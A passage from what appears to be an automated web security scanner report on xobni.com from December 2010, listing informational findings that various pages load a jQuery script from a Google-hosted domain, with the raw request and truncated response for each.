Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.33. http://www.xobni.com/enterprise/salesforce_extension

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/salesforce_extension

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/salesforce_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.34. http://www.xobni.com/enterprise/sharepoint_extension

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sharepoint_extension

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/sharepoint_extension HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.35. http://www.xobni.com/enterprise/sign_up

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sign_up

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/sign_up HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.36. http://www.xobni.com/enterprise/solutions_providers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/solutions_providers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/solutions_providers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.37. http://www.xobni.com/errors/401.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/401.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /errors/401.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7653

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Error 401 Unautho
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.38. http://www.xobni.com/errors/403.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/403.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /errors/403.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Error 403 Forbidd
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.39. http://www.xobni.com/errors/404.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/404.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /errors/404.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.40. http://www.xobni.com/errors/500.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/500.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /errors/500.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Server Error</TIT
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.41. http://www.xobni.com/errors/general.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /errors/general.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /errors/general.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/errors/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni.com: Error<
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.42. http://www.xobni.com/facebook-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /facebook-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /facebook-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Facebook in Outlo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.43. http://www.xobni.com/fan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fan

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fan HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11294

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Share Your Love f
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.44. http://www.xobni.com/find-attachments

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /find-attachments

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /find-attachments HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Find and Organize
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.45. http://www.xobni.com/fr-fr/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr-fr/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Le plug-i
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.46. http://www.xobni.com/fr-fr/account.

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/account.

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr-fr/account. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.47. http://www.xobni.com/fr-fr/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/account/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr-fr/account/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<link rel='stylesheet' href='/csscache/1265760498/styles/account.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.48. http://www.xobni.com/fr-fr/legal/privacy.

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/legal/privacy.

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr-fr/legal/privacy. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7941

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.49. http://www.xobni.com/fr-fr/legal/tos.

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/legal/tos.

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr-fr/legal/tos. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7929

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.50. http://www.xobni.com/get-salesforce

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /get-salesforce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-salesforce HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13395

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.51. http://www.xobni.com/homepage/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
